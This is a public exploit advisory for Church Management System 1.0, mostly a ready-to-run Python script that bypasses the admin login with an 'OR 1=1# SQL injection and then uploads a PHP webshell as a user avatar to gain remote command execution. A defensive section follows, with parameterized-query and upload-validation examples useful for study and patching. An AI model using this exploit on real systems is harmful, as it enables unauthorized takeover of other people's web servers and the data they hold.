Church Management System 1.0 SQL Injection / Code Execution

Date: 21 Sep 2021. Reported by: Janik Wehrli. Source: packetstorm (packetstormsecurity.com).

Church Management System 1.0 Authentication Bypass via SQLi and RCE

Code

```python
# Exploit Title: Church Management System 1.0 - Authentication Bypass via SQLi + RCE
# Date: 21.09.2021
# Exploit Author: Janik Wehrli
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Ubuntu, Windows 10 + XAMPP 7.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Authentication Bypass Vulnerability which gives access to the Admin Account. The Admin Dashboard allows us to upload a PHP webshell by creating a new user with a malicious Avatar Image.

import requests, sys
from colorama import Fore, Back, Style
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
F = [Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE]
B = [Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE]
S = [Style.RESET_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT]
info = S[3] + F[5] + '[' + S[0] + S[3] + '-' + S[3] + F[5] + ']' + S[0] + ' '
err = S[3] + F[2] + '[' + S[0] + S[3] + '!' + S[3] + F[2] + ']' + S[0] + ' '
ok = S[3] + F[3] + '[' + S[0] + S[3] + '+' + S[3] + F[3] + ']' + S[0] + ' '


# Banner (the original ASCII art was flattened by whitespace collapsing on the page)
ASCII_ART = """
_____ _ _ __ __ _ _____ __ __ _____
/ ____| | | | | \/ | | | / ____| \/ |/ ____|
| | | |__ _ _ _ __ ___| |__ | \ / | __ _ _ __ ___ | |_ | | | \ / | (___
| | | '_ \| | | | '__/ __| '_ \ | |\/| |/ _` | '_ ` _ \| __| | | | |\/| |\___ \
| |____| | | | |_| | | | (__| | | | | | | | (_| | | | | | | |_ | |____| | | |____) |
\_____|_| |_|\__,_|_| \___|_| |_| |_| |_|\__, |_| |_| |_|\__| \_____|_| |_|_____/
__/ |
V.1.0 https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
Exploit by Janik Wehrli

"""

# Set variables
print(ASCII_ART)
SERVER_URL = str(input("Type in your Church Management System URL e.g http://192.168.20.20: \n"))
LOGIN_URL = SERVER_URL + '/church_management/classes/Login.php?f=login'
UPLOAD_URL = SERVER_URL + "/church_management/classes/Users.php?f=save"
PWN_URL = SERVER_URL + "/church_management/uploads/"
USERNAME = "'OR 1=1#"
PASSWORD = "PWNED"
WEBSHELL_NAME = ""

# Uncomment the bottom line to run the exploit through a proxy such as burp
# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# Create a simple web session with python
s = requests.Session()
# GET request to webserver - Start a session & retrieve a session cookie
get_session = s.get(LOGIN_URL, verify=False)
# Check connection to website & print session cookie to terminal OR die
if get_session.status_code == 200:
    print(ok + 'Successfully connected to Church Management System server & created session.')
    # .get() avoids a KeyError when the server sends no Set-Cookie header
    print(info + "Session Cookie: " + get_session.headers.get('Set-Cookie', ''))
else:
    print(err + 'Cannot connect to the server and create a web session.')
    sys.exit(-1)


# 1. Bypass Login
# POST data to bypass Authentication via SQL Injection
login_data = {'username': USERNAME, 'password': PASSWORD, 'login': ''}
print(info + "Attempting to Login to Church Management v1.0 with the following payload: " + "username:" + USERNAME + ":" + "password:" + PASSWORD)
# auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)
auth = s.post(url=LOGIN_URL, data=login_data, verify=False, allow_redirects=True)
if auth.status_code == 200:
    print(ok, "Success")
else:
    print(err, "Something Went Wrong")


# 2. Upload Webshell
# Content-Disposition: form-data; name="img"; filename="pwn.php"
# Content-Type: application/octet-stream
webshell = {
    'img':
    (
        'pwn.php',
        '6 a $2y$10$Nw16tMpX3SyhtPrhBMD1Ku4jntwsRyQOANFs3.Ikv8eXpoQ0RL9PK\n <?php echo shell_exec($_GET["cmd"]);?> \n',
        'application/octet-stream',
        {'Content-Disposition': 'form-data'}
    )
}
fdata = {'firstname': 'test2', 'lastname': 'test2', 'username': 'test2', 'password': 'test2'}
print(info + "Exploiting Church Management v1.0 file upload vulnerability via User Avatar to upload a PHP webshell")
# upload_webshell = s.post(url=UPLOAD_URL, files=webshell, data=fdata, verify=False, proxies=proxies)
upload_webshell = s.post(url=UPLOAD_URL, files=webshell, data=fdata, verify=False)

if upload_webshell.status_code == 200:
    print(ok, "Success")
else:
    print(err, "Something Went Wrong")

# The uploads directory lists its contents; find the first .php entry
uploaded_site = requests.get(PWN_URL)
soup = BeautifulSoup(uploaded_site.content, 'html.parser')
for a in soup.find_all('a', href=True):
    b = a['href']
    if "php" in b:
        WEBSHELL_NAME = b
        break

if upload_webshell.status_code == 200:
    print(ok, "Your Webshell is located under: " + PWN_URL + WEBSHELL_NAME)
    print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN_URL + WEBSHELL_NAME + "?cmd=whoami")
else:
    print(err, "Something went wrong")
```
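The two weaknesses the script chains are a string-built login query and an avatar upload that accepts a `.php` file as an image. The following Python is an added example, not code from the exploit or from the Church Management System project (which is PHP): it shows the vulnerable login pattern beside its parameterized replacement, and an upload validator that rejects the kind of file the script sends. The users table, the `admin` credential and the SHA-256 stand-in for the application's bcrypt hashing are all constructed for the demo; because the in-memory database is SQLite, the payload ends the query with SQLite's `--` comment instead of MySQL's `#` used on the page.

```python
import hashlib
import os
import secrets
import sqlite3

# Constructed sample credential for the in-memory users table (not from the page).
ADMIN_PASSWORD = "correct-horse-demo"

# Constructed stand-in for the upload body the script sends under the name pwn.php.
PHP_UPLOAD = b"<?php echo 'webshell stand-in'; ?>\n"


def hash_pw(password):
    # Stand-in for the application's bcrypt hashing. Unsalted SHA-256 is NOT a
    # suitable password hash in production; it only keeps this demo self-contained.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory stand-in for the application's users table (schema assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)",
               ("admin", hash_pw(ADMIN_PASSWORD)))
    return db


def login_vulnerable(db, username, password):
    """String-built WHERE clause: the pattern the 'OR 1=1 payload abuses.
    The quote closes the literal, OR 1=1 makes the predicate true for every
    row, and the trailing comment discards the password check entirely."""
    sql = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, hash_pw(password)))
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Parameterized query: the payload is bound as a literal username value,
    so it can never alter the query structure and matches no row."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, hash_pw(password))).fetchone()


# Avatar upload validation: extension allow-list, magic-byte check, PHP-tag scan,
# and a server-chosen filename so the client name (pwn.php) is never used on disk.
ALLOWED_EXT = {"png": "png", "jpg": "jpg", "jpeg": "jpg", "gif": "gif"}
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
         b"GIF87a": "gif", b"GIF89a": "gif"}


def validate_avatar(filename, content):
    """Return a server-chosen stored filename, or None if the upload is rejected."""
    ext = ALLOWED_EXT.get(os.path.splitext(filename)[1].lower().lstrip("."))
    if ext is None:
        return None          # e.g. "pwn.php": extension not on the allow-list
    detected = next((t for sig, t in MAGIC.items() if content.startswith(sig)), None)
    if detected != ext:
        return None          # bytes are not the image type the name claims
    if b"<?" in content:
        return None          # PHP opening tag embedded in an otherwise valid image
    return secrets.token_hex(16) + "." + detected


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, "'OR 1=1--", "PWNED"))
    print("parameterized login with payload:", login_safe(db, "'OR 1=1--", "PWNED"))
    print("pwn.php upload accepted as:", validate_avatar("pwn.php", PHP_UPLOAD))
    print("real PNG upload stored as:",
          validate_avatar("me.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

Note that the magic-byte check alone is not enough: a genuine image with a PHP tag appended can still be executed if the web server maps the uploads directory to the PHP interpreter, which is why the validator also scans for `<?` and why the stored name never carries a client-controlled extension. Disabling script execution in the uploads directory is the complementary server-side control.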
